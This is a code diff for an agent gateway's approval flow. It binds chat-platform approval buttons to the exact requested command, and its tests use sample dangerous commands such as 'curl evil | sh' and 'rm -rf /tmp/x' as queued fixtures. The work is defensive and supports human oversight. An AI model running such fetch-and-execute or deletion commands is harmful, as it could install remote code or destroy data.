@@ -8476,7 +8485,10 @@ def _define_discord_view_classes() -> None:
             # must not claim "Approved" — the command was already denied.
             try:
                 from tools.approval import resolve_gateway_approval
-                count = resolve_gateway_approval(self.session_key, choice)
+                count = resolve_gateway_approval(
+                    self.session_key, choice,
+                    expected_approval_id=self.approval_id or None,
+                )
                 logger.info(
                     "Discord button resolved %d approval(s) for session %s (choice=%s, user=%s)",
                     count, self.session_key, choice, interaction.user.display_name,

--- a/plugins/platforms/feishu/adapter.py
+++ b/plugins/platforms/feishu/adapter.py
@@ -2061,25 +2061,29 @@ class FeishuAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
         """Send an interactive card with approval buttons.
 
         The buttons carry ``hermes_action`` in their value dict so that
         ``_handle_card_action_event`` can intercept them and call
         ``resolve_gateway_approval()`` to unblock the waiting agent thread.
+        ``approval_id`` is the gateway request identity this card shows;
+        it rides in the callback state so a click resolves exactly that
+        request or nothing.
         """
         if not self._client:
             return SendResult(success=False, error="Not connected")
 
         try:
-            approval_id = next(self._approval_counter)
+            callback_ref = next(self._approval_counter)
 
             def _btn(label: str, action_name: str, btn_type: str = "default") -> dict:
                 return {
                     "tag": "button",
                     "text": {"tag": "plain_text", "content": label},
                     "type": btn_type,
-                    "value": {"hermes_action": action_name, "approval_id": approval_id},
+                    "value": {"hermes_action": action_name, "approval_id": callback_ref},
                 }
 
             actions = [_btn("✅ Allow Once", "approve_once", "primary")]
@@ -2117,10 +2121,11 @@ class FeishuAdapter(BasePlatformAdapter):
 
             result = self._finalize_send_result(response, "send_exec_approval failed")
             if result.success:
-                self._approval_state[approval_id] = {
+                self._approval_state[callback_ref] = {
                     "session_key": session_key,
                     "message_id": result.message_id or "",
                     "chat_id": chat_id,
+                    "approval_id": approval_id or "",
                 }
             return result
         except Exception as exc:
@@ -2921,7 +2926,10 @@ class FeishuAdapter(BasePlatformAdapter):
             return
         try:
             from tools.approval import resolve_gateway_approval
-            count = resolve_gateway_approval(state["session_key"], choice)
+            count = resolve_gateway_approval(
+                state["session_key"], choice,
+                expected_approval_id=str(state.get("approval_id") or "") or None,
+            )
             logger.info(
                 "Feishu button resolved %d approval(s) for session %s (choice=%s, user=%s)",
                 count, state["session_key"], choice, user_name,

--- a/plugins/platforms/matrix/adapter.py
+++ b/plugins/platforms/matrix/adapter.py
@@ -519,6 +519,7 @@ class _MatrixApprovalPrompt:
         resolved: bool = False,
         requester_user_id: str | None = None,
         expires_at: float | None = None,
+        approval_id: str = "",
     ):
         self.session_key = session_key
         self.chat_id = chat_id
@@ -526,6 +527,9 @@ class _MatrixApprovalPrompt:
         self.resolved = resolved
         self.requester_user_id = requester_user_id
         self.expires_at = expires_at
+        # Gateway request identity this prompt shows: a reaction resolves
+        # exactly this request or nothing (never the FIFO head).
+        self.approval_id = approval_id or ""
         self.bot_reaction_events: dict[str, str] = {}  # emoji -> event_id
 
 
@@ -2617,8 +2621,14 @@ class MatrixAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
-        """Send a reaction-based exec approval prompt for Matrix."""
+        """Send a reaction-based exec approval prompt for Matrix.
+
+        ``approval_id`` binds the prompt's reactions to the exact queued
+        request it shows, so a stale reaction can never resolve a
+        different pending command.
+        """
         if not self._client:
             return SendResult(success=False, error="Not connected")
 
@@ -2655,6 +2665,7 @@ class MatrixAdapter(BasePlatformAdapter):
             message_id=result.message_id,
             requester_user_id=requester_user_id,
             expires_at=time.monotonic() + max(self._approval_timeout_seconds, 0),
+            approval_id=approval_id,
         )
         old_event = self._approval_prompt_by_session.get(session_key)
         if old_event:
@@ -4022,7 +4033,10 @@ class MatrixAdapter(BasePlatformAdapter):
                 try:
                     from tools.approval import resolve_gateway_approval
 
-                    count = resolve_gateway_approval(prompt.session_key, choice)
+                    count = resolve_gateway_approval(
+                        prompt.session_key, choice,
+                        expected_approval_id=prompt.approval_id or None,
+                    )
                     if count:
                         prompt.resolved = True
                         self._approval_prompts_by_event.pop(reacts_to, None)

--- a/plugins/platforms/slack/adapter.py
+++ b/plugins/platforms/slack/adapter.py
@@ -6376,11 +6376,14 @@ class SlackAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
         """Send a Block Kit approval prompt with interactive buttons.
 
         The buttons call ``resolve_gateway_approval()`` to unblock the waiting
-        agent thread — same mechanism as the text ``/approve`` flow.
+        agent thread — same mechanism as the text ``/approve`` flow.  The
+        button ``value`` carries ``approval_id`` alongside the session key so
+        a click resolves exactly the request this prompt shows.
         """
         if not self._app:
             return SendResult(success=False, error="Not connected")
@@ -6405,13 +6408,15 @@ class SlackAdapter(BasePlatformAdapter):
             budget = 3000 - len(header) - len(reason) - len("``````\n") - len("...")
             cmd_preview = command[:budget] + "..." if len(command) > budget else command
 
+            from tools.approval import encode_approval_callback_value
+            button_value = encode_approval_callback_value(session_key, approval_id)
             actions = [
                 {
                     "type": "button",
                     "text": {"type": "plain_text", "text": "Allow Once"},
                     "style": "primary",
                     "action_id": "hermes_approve_once",
-                    "value": session_key,
+                    "value": button_value,
                 },
             ]
             if not smart_denied and allow_session:
@@ -6419,21 +6424,21 @@ class SlackAdapter(BasePlatformAdapter):
                     "type": "button",
                     "text": {"type": "plain_text", "text": "Allow Session"},
                     "action_id": "hermes_approve_session",
-                    "value": session_key,
+                    "value": button_value,
                 })
                 if allow_permanent:
                     actions.append({
                         "type": "button",
                         "text": {"type": "plain_text", "text": "Always Allow"},
                         "action_id": "hermes_approve_always",
-                        "value": session_key,
+                        "value": button_value,
                     })
             actions.append({
                 "type": "button",
                 "text": {"type": "plain_text", "text": "Deny"},
                 "style": "danger",
                 "action_id": "hermes_deny",
-                "value": session_key,
+                "value": button_value,
             })
             blocks = [
                 {
@@ -6872,7 +6877,10 @@ class SlackAdapter(BasePlatformAdapter):
 
         team_id = self._event_team_id({}, body)
         action_id = action.get("action_id", "")
-        session_key = action.get("value", "")
+        from tools.approval import decode_approval_callback_value
+        session_key, gateway_approval_id = decode_approval_callback_value(
+            action.get("value", "")
+        )
         message = body.get("message", {})
         msg_ts = message.get("ts", "")
         channel_id = body.get("channel", {}).get("id", "")
@@ -6931,7 +6939,10 @@ class SlackAdapter(BasePlatformAdapter):
         try:
             from tools.approval import resolve_gateway_approval
 
-            count = resolve_gateway_approval(session_key, choice)
+            count = resolve_gateway_approval(
+                session_key, choice,
+                expected_approval_id=gateway_approval_id,
+            )
             logger.info(
                 "Slack button resolved %d approval(s) for session %s (choice=%s, user=%s)",
                 count,

--- a/plugins/platforms/teams/adapter.py
+++ b/plugins/platforms/teams/adapter.py
@@ -1130,7 +1130,25 @@ class TeamsAdapter(BasePlatformAdapter):
                 ),
             )
 
-        resolve_gateway_approval(session_key, choice)
+        # Bind the click to the exact request this card shows; a stale or
+        # duplicate click resolves nothing instead of the FIFO head.
+        count = resolve_gateway_approval(
+            session_key, choice,
+            expected_approval_id=str(data.get("approval_id") or "") or None,
+        )
+        if not count:
+            return InvokeResponse(
+                status=200,
+                body=AdaptiveCardActionCardResponse(
+                    value=AdaptiveCard()
+                    .with_version("1.4")
+                    .with_body([TextBlock(
+                        text="⌛ Approval expired — command was not run "
+                             "(already timed out or resolved elsewhere).",
+                        wrap=True,
+                    )])
+                ),
+            )
 
         label_map = {
             "once": "✅ Allowed (once)",
@@ -1165,8 +1183,13 @@ class TeamsAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
-        """Send an Adaptive Card approval prompt with Allow/Deny buttons."""
+        """Send an Adaptive Card approval prompt with Allow/Deny buttons.
+
+        ``approval_id`` rides in the button data so a click resolves
+        exactly the request this card shows, never the FIFO head.
+        """
         if not self._app:
             return SendResult(success=False, error="Teams app not initialized")
 
@@ -1174,6 +1197,7 @@ class TeamsAdapter(BasePlatformAdapter):
         # Truncated for button data payload — just enough to reconstruct the card body.
         btn_data_base = {
             "session_key": session_key,
+            "approval_id": approval_id or "",
             "cmd": command[:200] + "..." if len(command) > 200 else command,
             "desc": description,
         }

--- a/plugins/platforms/telegram/adapter.py
+++ b/plugins/platforms/telegram/adapter.py
@@ -871,8 +871,11 @@ class TelegramAdapter(BasePlatformAdapter):
         # Interactive model picker state per chat
         self._model_picker_state: Dict[str, dict] = {}
         self._choice_picker_state: Dict[str, dict] = {}
-        # Approval button state: message_id → session_key
-        self._approval_state: Dict[int, str] = {}
+        # Approval button state: callback ref → (session_key, gateway
+        # approval_id).  The approval_id rides along so a button click
+        # resolves exactly the request its prompt showed — callback_data's
+        # 64-byte cap is why the full identity can't live in the payload.
+        self._approval_state: Dict[int, tuple] = {}
         # Slash-confirm button state: confirm_id → session_key (for /reload-mcp
         # and any other slash-confirm prompts; see GatewayRunner._request_slash_confirm).
         self._slash_confirm_state: Dict[str, str] = {}
@@ -5556,11 +5559,14 @@ class TelegramAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
         """Send an inline-keyboard approval prompt with interactive buttons.
 
         The buttons call ``resolve_gateway_approval()`` to unblock the waiting
         agent thread — same mechanism as the text ``/approve`` flow.
+        ``approval_id`` is the gateway request identity this prompt shows;
+        clicks resolve exactly that request or nothing.
         """
         if not self._bot:
             return SendResult(success=False, error="Not connected")
@@ -5571,26 +5577,26 @@ class TelegramAdapter(BasePlatformAdapter):
             # Resolve thread context for thread replies
             thread_id = self._metadata_thread_id(metadata)
 
-            # We'll use the message_id as part of callback_data to look up session_key
-            # Send a placeholder first, then update — or use a counter.
-            # Simpler: use a monotonic counter to generate short IDs.
+            # callback_data is capped at 64 bytes, too small for
+            # session_key + approval_id — use a monotonic counter as the
+            # callback ref and keep the real identity in _approval_state.
             import itertools
             if not hasattr(self, "_approval_counter"):
                 self._approval_counter = itertools.count(1)
-            approval_id = next(self._approval_counter)
+            callback_ref = next(self._approval_counter)
 
             buttons = [
-                InlineKeyboardButton("✅ Allow Once", callback_data=f"ea:once:{approval_id}")
+                InlineKeyboardButton("✅ Allow Once", callback_data=f"ea:once:{callback_ref}")
             ]
             if not smart_denied and allow_session:
                 buttons.append(
-                    InlineKeyboardButton("✅ Session", callback_data=f"ea:session:{approval_id}")
+                    InlineKeyboardButton("✅ Session", callback_data=f"ea:session:{callback_ref}")
                 )
                 if allow_permanent:
                     buttons.append(
-                        InlineKeyboardButton("✅ Always", callback_data=f"ea:always:{approval_id}")
+                        InlineKeyboardButton("✅ Always", callback_data=f"ea:always:{callback_ref}")
                     )
-            buttons.append(InlineKeyboardButton("❌ Deny", callback_data=f"ea:deny:{approval_id}"))
+            buttons.append(InlineKeyboardButton("❌ Deny", callback_data=f"ea:deny:{callback_ref}"))
             # Pair into rows (2x2 for the full set) so labels stay readable on
             # mobile — a single 4-button row truncates to "Allo… / Ses… / …".
             rows = [buttons[i:i + 2] for i in range(0, len(buttons), 2)]
@@ -5617,8 +5623,8 @@ class TelegramAdapter(BasePlatformAdapter):
 
             msg = await self._send_message_with_thread_fallback(**kwargs)
 
-            # Store session_key keyed by approval_id for the callback handler
-            self._approval_state[approval_id] = session_key
+            # Store the request identity keyed by callback ref for the handler
+            self._approval_state[callback_ref] = (session_key, approval_id or "")
 
             return SendResult(success=True, message_id=str(msg.message_id))
         except Exception as e:
@@ -6481,7 +6487,12 @@ class TelegramAdapter(BasePlatformAdapter):
                     await query.answer(text="⛔ You are not authorized to approve commands.")
                     return
 
-                session_key = self._approval_state.pop(approval_id, None)
+                state = self._approval_state.pop(approval_id, None)
+                if isinstance(state, tuple):
+                    session_key, gateway_approval_id = state
+                else:
+                    # Legacy bare session_key entry (pre-identity prompt).
+                    session_key, gateway_approval_id = state, ""
                 if not session_key:
                     await query.answer(text="This approval has already been resolved.")
                     return
@@ -6496,7 +6507,10 @@ class TelegramAdapter(BasePlatformAdapter):
                 # regression follow-up: 60s waits made stale taps common).
                 try:
                     from tools.approval import resolve_gateway_approval
-                    count = resolve_gateway_approval(session_key, choice)
+                    count = resolve_gateway_approval(
+                        session_key, choice,
+                        expected_approval_id=gateway_approval_id or None,
+                    )
                     logger.info(
                         "Telegram button resolved %d approval(s) for session %s (choice=%s, user=%s)",
                         count, session_key, choice, user_display,

--- a/tests/gateway/test_approval_prompt_delivery_advertise.py
+++ b/tests/gateway/test_approval_prompt_delivery_advertise.py
@@ -1,0 +1,372 @@
+"""Initial approval-prompt delivery must record the advertised identity.
+
+Typed delayed consent (``/approve`` / ``/deny`` and their bare-word aliases)
+is bound to "the request the user was shown".  For the interactive flow that
+binding is created HERE: when the gateway's approval prompt sender
+(:func:`gateway.run._send_gateway_approval_prompt`) successfully delivers
+the prompt — via the adapter's button UI or the plain-text fallback — that
+exact request and its frozen command are advertised.
+
+A FAILED delivery must NOT advertise: the user never saw the request, so a
+later typed approve must resolve nothing and trigger a visible re-present
+instead (fail-safe, covered in test_pending_approval_recovery.py).
+"""
+
+from types import SimpleNamespace
+
+import pytest
+
+
+def _clear_approval_state():
+    from tools import approval as mod
+
+    mod._gateway_queues.clear()
+    mod._gateway_notify_cbs.clear()
+    mod._session_approved.clear()
+    mod._permanent_approved.clear()
+    mod._pending.clear()
+    mod._advertised_approvals.clear()
+
+
+def _enqueue(session_key: str, command: str):
+    from tools.approval import _ApprovalEntry, _gateway_queues
+
+    entry = _ApprovalEntry({"command": command, "description": "dangerous"})
+    _gateway_queues.setdefault(session_key, []).append(entry)
+    return entry
+
+
+class _FakeFuture:
+    def __init__(self, value=None, exc=None):
+        self._value = value
+        self._exc = exc
+
+    def result(self, timeout=None):
+        if self._exc is not None:
+            raise self._exc
+        return self._value
+
+
+def _sched_stub(button=None, text=None):
+    """Fake safe_schedule_threadsafe keyed on which coroutine is scheduled.
+
+    ``button`` / ``text`` may be a SendResult-like namespace, an Exception
+    (raised from ``.result()``), or None (loop unavailable → returns None,
+    like the real helper).
+    """
+    def stub(coro, loop, logger=None, log_message=""):
+        name = getattr(coro, "__qualname__", "") or ""
+        coro.close()
+        outcome = button if "send_exec_approval" in name else text
+        if outcome is None:
+            return None
+        if isinstance(outcome, Exception):
+            return _FakeFuture(exc=outcome)
+        return _FakeFuture(value=outcome)
+
+    return stub
+
+
+class _ButtonAdapter:
+    typed_command_prefix = "/"
+
+    def __init__(self):
+        self.paused_chat = None
+
+    def pause_typing_for_chat(self, chat_id):
+        self.paused_chat = chat_id
+
+    async def send_exec_approval(self, **kwargs):
+        return None  # value comes from the scheduling stub
+
+    async def send(self, chat_id, content, reply_to=None, metadata=None):
+        return None
+
+
+class _TextAdapter:
+    """Adapter without a button UI — text fallback only."""
+
+    typed_command_prefix = "!"
+
+    def pause_typing_for_chat(self, chat_id):
+        pass
+
+    async def send(self, chat_id, content, reply_to=None, metadata=None):
+        return None
+
+
+def _send_prompt(monkeypatch, adapter, session_key, entry, *, button=None, text=None):
+    import gateway.run as run_mod
+
+    monkeypatch.setattr(run_mod, "safe_schedule_threadsafe", _sched_stub(button, text))
+    run_mod._send_gateway_approval_prompt(
+        adapter,
+        "chat-1",
+        loop=None,
+        thread_metadata=None,
+        session_key=session_key,
+        approval_data=entry.data,
+    )
+
+
+@pytest.fixture(autouse=True)
+def _clean_state():
+    _clear_approval_state()
+    yield
+    _clear_approval_state()
+
+
+def test_button_success_advertises_head(monkeypatch):
+    from tools.approval import get_advertised_approval
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+    adapter = _ButtonAdapter()
+    _send_prompt(
+        monkeypatch, adapter, "sk", entry,
+        button=SimpleNamespace(success=True, error=None),
+    )
+
+    adv = get_advertised_approval("sk")
+    assert adv is not None
+    assert adv["approval_id"] == entry.approval_id
+    assert adapter.paused_chat == "chat-1"
+
+
+def test_button_failure_falls_back_and_text_success_advertises(monkeypatch):
+    from tools.approval import get_advertised_approval
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+    _send_prompt(
+        monkeypatch, _ButtonAdapter(), "sk", entry,
+        button=RuntimeError("discord down"),
+        text=SimpleNamespace(success=True),
+    )
+
+    adv = get_advertised_approval("sk")
+    assert adv is not None
+    assert adv["approval_id"] == entry.approval_id
+
+
+def test_text_only_adapter_success_advertises(monkeypatch):
+    from tools.approval import get_advertised_approval
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+    _send_prompt(
+        monkeypatch, _TextAdapter(), "sk", entry,
+        text=SimpleNamespace(success=True),
+    )
+
+    adv = get_advertised_approval("sk")
+    assert adv is not None
+    assert adv["approval_id"] == entry.approval_id
+
+
+def test_all_sends_failing_do_not_advertise(monkeypatch):
+    """The user saw nothing — a later typed approve must have no binding."""
+    from tools.approval import get_advertised_approval, has_blocking_approval
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+    _send_prompt(
+        monkeypatch, _ButtonAdapter(), "sk", entry,
+        button=RuntimeError("discord down"),
+        text=RuntimeError("send failed"),
+    )
+
+    assert get_advertised_approval("sk") is None
+    # The entry itself stays pending (the waiter owns its lifecycle).
+    assert has_blocking_approval("sk") is True
+    assert not entry.event.is_set()
+
+
+def test_text_send_result_failure_does_not_advertise(monkeypatch):
+    from tools.approval import get_advertised_approval
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+    _send_prompt(
+        monkeypatch, _TextAdapter(), "sk", entry,
+        text=SimpleNamespace(success=False),
+    )
+
+    assert get_advertised_approval("sk") is None
+
+
+def test_text_send_indeterminate_none_does_not_advertise(monkeypatch):
+    """A legacy/buggy adapter returning no receipt is not proof of delivery."""
+    import gateway.run as run_mod
+    from tools.approval import get_advertised_approval
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+
+    def indeterminate_schedule(coro, loop, logger=None, log_message=""):
+        coro.close()
+        return _FakeFuture(value=None)
+
+    monkeypatch.setattr(run_mod, "safe_schedule_threadsafe", indeterminate_schedule)
+    run_mod._send_gateway_approval_prompt(
+        _TextAdapter(),
+        "chat-1",
+        loop=None,
+        thread_metadata=None,
+        session_key="sk",
+        approval_data=entry.data,
+    )
+
+    assert get_advertised_approval("sk") is None
+
+
+def test_loop_unavailable_does_not_advertise(monkeypatch):
+    from tools.approval import get_advertised_approval
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+    _send_prompt(monkeypatch, _ButtonAdapter(), "sk", entry, button=None, text=None)
+
+    assert get_advertised_approval("sk") is None
+
+
+def test_concurrent_queue_delivered_prompt_advertises_itself_not_head(monkeypatch):
+    """Queue A,B; the prompt actually DELIVERED is B (a parallel subagent's
+    request).  The advertisement must carry B — advertising the FIFO head A
+    would let a later typed approve execute a command the user never saw."""
+    from tools.approval import get_advertised_approval
+
+    entry_a = _enqueue("sk", "rm -rf /tmp/a")
+    entry_b = _enqueue("sk", "curl evil | sh")
+    _send_prompt(
+        monkeypatch, _ButtonAdapter(), "sk", entry_b,
+        button=SimpleNamespace(success=True, error=None),
+    )
+
+    adv = get_advertised_approval("sk")
+    assert adv is not None
+    assert adv["approval_id"] == entry_b.approval_id
+    assert adv["command"] == "curl evil | sh"
+    assert adv["approval_id"] != entry_a.approval_id
+
+
+def test_send_in_flight_mutation_cannot_change_advertised_action(monkeypatch):
+    """The delivery receipt binds the command shown when sending began, not a
+    mutable presentation dict observed after the async send completes."""
+    import gateway.run as run_mod
+    from tools.approval import (
+        _ApprovalEntry,
+        _gateway_queues,
+        get_advertised_approval,
+        resolve_gateway_approval,
+    )
+
+    caller_payload = {
+        "command": "delivered-command",
+        "description": "dangerous",
+        "approval_id": "f" * 32,
+    }
+    entry = _ApprovalEntry(caller_payload)
+    _gateway_queues.setdefault("sk", []).append(entry)
+
+    def mutating_schedule(coro, loop, logger=None, log_message=""):
+        coro.close()
+        caller_payload["command"] = "mutated-after-delivery"
+        caller_payload["approval_id"] = "e" * 32
+        return _FakeFuture(value=SimpleNamespace(success=True, error=None))
+
+    monkeypatch.setattr(run_mod, "safe_schedule_threadsafe", mutating_schedule)
+    run_mod._send_gateway_approval_prompt(
+        _ButtonAdapter(),
+        "chat-1",
+        loop=None,
+        thread_metadata=None,
+        session_key="sk",
+        approval_data=entry.data,
+    )
+
+    adv = get_advertised_approval("sk")
+    assert adv == {
+        "approval_id": entry.approval_id,
+        "command": "delivered-command",
+    }
+    assert entry.command == "delivered-command"
+    assert resolve_gateway_approval(
+        "sk", "once",
+        expected_approval_id=adv["approval_id"],
+        expected_command=adv["command"],
+    ) == 1
+    assert entry.result == "once"
+
+
+def test_concurrent_queue_typed_approve_resolves_delivered_prompt_only(monkeypatch):
+    """End-to-end shape of finding 1: B's prompt is delivered, the typed
+    approve bound to the advertisement resolves B only; A stays pending."""
+    from tools.approval import (
+        _gateway_queues,
+        get_advertised_approval,
+        resolve_gateway_approval,
+    )
+
+    entry_a = _enqueue("sk", "rm -rf /tmp/a")
+    entry_b = _enqueue("sk", "curl evil | sh")
+    _send_prompt(
+        monkeypatch, _TextAdapter(), "sk", entry_b,
+        text=SimpleNamespace(success=True),
+    )
+
+    adv = get_advertised_approval("sk")
+    assert adv is not None and adv["approval_id"] == entry_b.approval_id
+    count = resolve_gateway_approval(
+        "sk", "once",
+        expected_approval_id=adv["approval_id"],
+        expected_command=adv["command"],
+    )
+    assert count == 1
+    assert entry_b.event.is_set() and entry_b.result == "once"
+    assert not entry_a.event.is_set() and entry_a.result is None
+    assert _gateway_queues["sk"] == [entry_a]
+
+
+def test_concurrent_queue_failed_delivery_advertises_nothing(monkeypatch):
+    """Queue A,B; B's prompt delivery fails on both paths — no binding may
+    be created for either request."""
+    from tools.approval import get_advertised_approval, has_blocking_approval
+
+    _enqueue("sk", "rm -rf /tmp/a")
+    entry_b = _enqueue("sk", "curl evil | sh")
+    _send_prompt(
+        monkeypatch, _ButtonAdapter(), "sk", entry_b,
+        button=RuntimeError("discord down"),
+        text=RuntimeError("send failed"),
+    )
+
+    assert get_advertised_approval("sk") is None
+    assert has_blocking_approval("sk") is True
+
+
+def test_button_send_receives_approval_id(monkeypatch):
+    """The adapter's send_exec_approval is handed the request identity so
+    every platform can bind its buttons to the exact prompt."""
+    import gateway.run as run_mod
+
+    entry = _enqueue("sk", "rm -rf /tmp/x")
+    seen = {}
+
+    class _CapturingAdapter(_ButtonAdapter):
+        async def send_exec_approval(self, **kwargs):
+            seen.update(kwargs)
+            return None
+
+    def stub(coro, loop, logger=None, log_message=""):
+        import asyncio
+        try:
+            asyncio.get_event_loop_policy().new_event_loop().run_until_complete(coro)
+        except Exception:
+            coro.close()
+        return _FakeFuture(value=SimpleNamespace(success=True, error=None))
+
+    monkeypatch.setattr(run_mod, "safe_schedule_threadsafe", stub)
+    run_mod._send_gateway_approval_prompt(
+        _CapturingAdapter(),
+        "chat-1",
+        loop=None,
+        thread_metadata=None,
+        session_key="sk",
+        approval_data=entry.data,
+    )
+
+    assert seen.get("approval_id") == entry.approval_id

--- a/tests/gateway/test_approval_prompt_redaction.py
+++ b/tests/gateway/test_approval_prompt_redaction.py
@@ -111,9 +111,15 @@ class TestApprovalCommandWiring:
         )
 
     def test_chat_platform_path_redacts_before_send(self):
+        # The chat-platform prompt sender lives in the module-level
+        # _send_gateway_approval_prompt (the per-run _approval_notify_sync
+        # closure is a thin binding over it, extracted so the
+        # delivery→advertise wiring is unit-testable).
         import gateway.run as run
 
-        self._assert_redacts_then_uses(run, "_approval_notify_sync", "send_exec_approval")
+        self._assert_redacts_then_uses(
+            run, "_send_gateway_approval_prompt", "send_exec_approval"
+        )
 
     def test_sse_api_path_redacts_before_enqueue(self):
         from gateway.platforms import api_server

--- a/tests/gateway/test_approve_deny_commands.py
+++ b/tests/gateway/test_approve_deny_commands.py
@@ -74,6 +74,7 @@ def _clear_approval_state():
     mod._session_approved.clear()
     mod._permanent_approved.clear()
     mod._pending.clear()
+    mod._advertised_approvals.clear()
 
 
 def _wait_until(predicate, timeout=30.0, interval=0.02):
@@ -169,9 +170,13 @@ class TestApproveCommand:
 
 
     @pytest.mark.asyncio
-    async def test_approve_all_resolves_multiple(self):
-        """/approve all resolves all pending approvals."""
-        from tools.approval import _ApprovalEntry, _gateway_queues
+    async def test_approve_all_refused_walks_one_at_a_time(self):
+        """/approve all is refused with multiple pending: a single shown
+        prompt cannot authorize entries the user may never have seen.
+        Recovery is one explicit approve per request."""
+        from tools.approval import (
+            _ApprovalEntry, _gateway_queues, advertise_blocking_approval,
+        )
 
         runner = _make_runner()
         source = _make_source()
@@ -180,29 +185,46 @@ class TestApproveCommand:
         e1 = _ApprovalEntry({"command": "cmd1"})
         e2 = _ApprovalEntry({"command": "cmd2"})
         _gateway_queues[session_key] = [e1, e2]
+        advertise_blocking_approval(session_key)  # delivered prompt = head
 
         result = await runner._handle_approve_command(_make_event("/approve all"))
-        assert "2 commands" in result
+        assert "one at a time" in result.lower()
+        assert not e1.event.is_set()
+        assert not e2.event.is_set()
+
+        # First explicit approve resolves exactly the shown head.
+        await runner._handle_approve_command(_make_event("/approve"))
         assert e1.event.is_set()
+        assert e1.result == "once"
+        assert not e2.event.is_set()
+
+        # The next approve has no binding yet → re-presents e2, then a
+        # fresh approve resolves it.
+        await runner._handle_approve_command(_make_event("/approve"))
+        assert not e2.event.is_set()
+        await runner._handle_approve_command(_make_event("/approve"))
         assert e2.event.is_set()
+        assert e2.result == "once"
 
     @pytest.mark.asyncio
-    async def test_approve_all_session(self):
-        """/approve all session resolves all with session scope."""
-        from tools.approval import _ApprovalEntry, _gateway_queues
+    async def test_approve_all_session_single_pending(self):
+        """Bulk-of-one degrades to a single resolve with the session scope
+        preserved — no unseen tail exists to protect."""
+        from tools.approval import (
+            _ApprovalEntry, _gateway_queues, advertise_blocking_approval,
+        )
 
         runner = _make_runner()
         source = _make_source()
         session_key = runner._session_key_for_source(source)
 
         e1 = _ApprovalEntry({"command": "cmd1"})
-        e2 = _ApprovalEntry({"command": "cmd2"})
-        _gateway_queues[session_key] = [e1, e2]
+        _gateway_queues[session_key] = [e1]
+        advertise_blocking_approval(session_key)
 
         result = await runner._handle_approve_command(_make_event("/approve all session"))
         assert "session" in result.lower()
         assert e1.result == "session"
-        assert e2.result == "session"
 
 
 # ------------------------------------------------------------------
@@ -227,6 +249,8 @@ class TestDenyCommand:
 
         entry = _ApprovalEntry({"command": "test"})
         _gateway_queues[session_key] = [entry]
+        from tools.approval import advertise_blocking_approval
+        advertise_blocking_approval(session_key)  # delivered prompt binding
 
         result = await runner._handle_deny_command(
             _make_event("/deny that path is still in use")
@@ -236,9 +260,13 @@ class TestDenyCommand:
         assert "that path is still in use" in result
 
     @pytest.mark.asyncio
-    async def test_deny_all_with_reason(self):
-        """/deny all <reason> denies everything and relays one reason."""
-        from tools.approval import _ApprovalEntry, _gateway_queues
+    async def test_deny_all_refused_then_single_deny_with_reason(self):
+        """/deny all is refused with multiple pending (same identity rule
+        as /approve all); a single /deny with a reason then resolves the
+        shown head only."""
+        from tools.approval import (
+            _ApprovalEntry, _gateway_queues, advertise_blocking_approval,
+        )
 
         runner = _make_runner()
         source = _make_source()
@@ -247,13 +275,22 @@ class TestDenyCommand:
         e1 = _ApprovalEntry({"command": "cmd1"})
         e2 = _ApprovalEntry({"command": "cmd2"})
         _gateway_queues[session_key] = [e1, e2]
+        advertise_blocking_approval(session_key)
 
         result = await runner._handle_deny_command(
             _make_event("/deny all wrong directory")
         )
-        assert "2 commands" in result
-        assert all(e.result == "deny" for e in [e1, e2])
-        assert all(e.reason == "wrong directory" for e in [e1, e2])
+        assert "one at a time" in result.lower()
+        assert not e1.event.is_set()
+        assert not e2.event.is_set()
+
+        result = await runner._handle_deny_command(
+            _make_event("/deny wrong directory")
+        )
+        assert e1.result == "deny"
+        assert e1.reason == "wrong directory"
+        assert "wrong directory" in result
+        assert not e2.event.is_set()
 
 
 # ------------------------------------------------------------------

--- a/tests/gateway/test_feishu_approval_buttons.py
+++ b/tests/gateway/test_feishu_approval_buttons.py
@@ -211,13 +211,35 @@ class TestResolveApproval:
             "session_key": "agent:main:feishu:group:oc_12345",
             "message_id": "msg_001",
             "chat_id": "oc_12345",
+            "approval_id": "ab" * 16,
         }
 
         with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
             await adapter._resolve_approval(1, "once", "Norbert", open_id="ou_user1", chat_id="oc_12345")
 
-        mock_resolve.assert_called_once_with("agent:main:feishu:group:oc_12345", "once")
+        # The click is bound to the exact request the card showed.
+        mock_resolve.assert_called_once_with(
+            "agent:main:feishu:group:oc_12345", "once",
+            expected_approval_id="ab" * 16,
+        )
         assert 1 not in adapter._approval_state
+
+    @pytest.mark.asyncio
+    async def test_legacy_state_without_id_resolves_unbound(self):
+        adapter = _make_adapter()
+        adapter._approval_state[1] = {
+            "session_key": "agent:main:feishu:group:oc_12345",
+            "message_id": "msg_001",
+            "chat_id": "oc_12345",
+        }
+
+        with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
+            await adapter._resolve_approval(1, "once", "Norbert", open_id="ou_user1", chat_id="oc_12345")
+
+        mock_resolve.assert_called_once_with(
+            "agent:main:feishu:group:oc_12345", "once",
+            expected_approval_id=None,
+        )
 
 
     @pytest.mark.asyncio

--- a/tests/gateway/test_matrix_exec_approval.py
+++ b/tests/gateway/test_matrix_exec_approval.py
@@ -18,6 +18,37 @@ class TestMatrixExecApprovalReactions:
         # Resolve user_id so _is_self_sender doesn't defensively drop all traffic (#15763).
         adapter._user_id = "@bot:example.org"
         adapter._approval_prompts_by_event["$target"] = _MatrixApprovalPrompt(
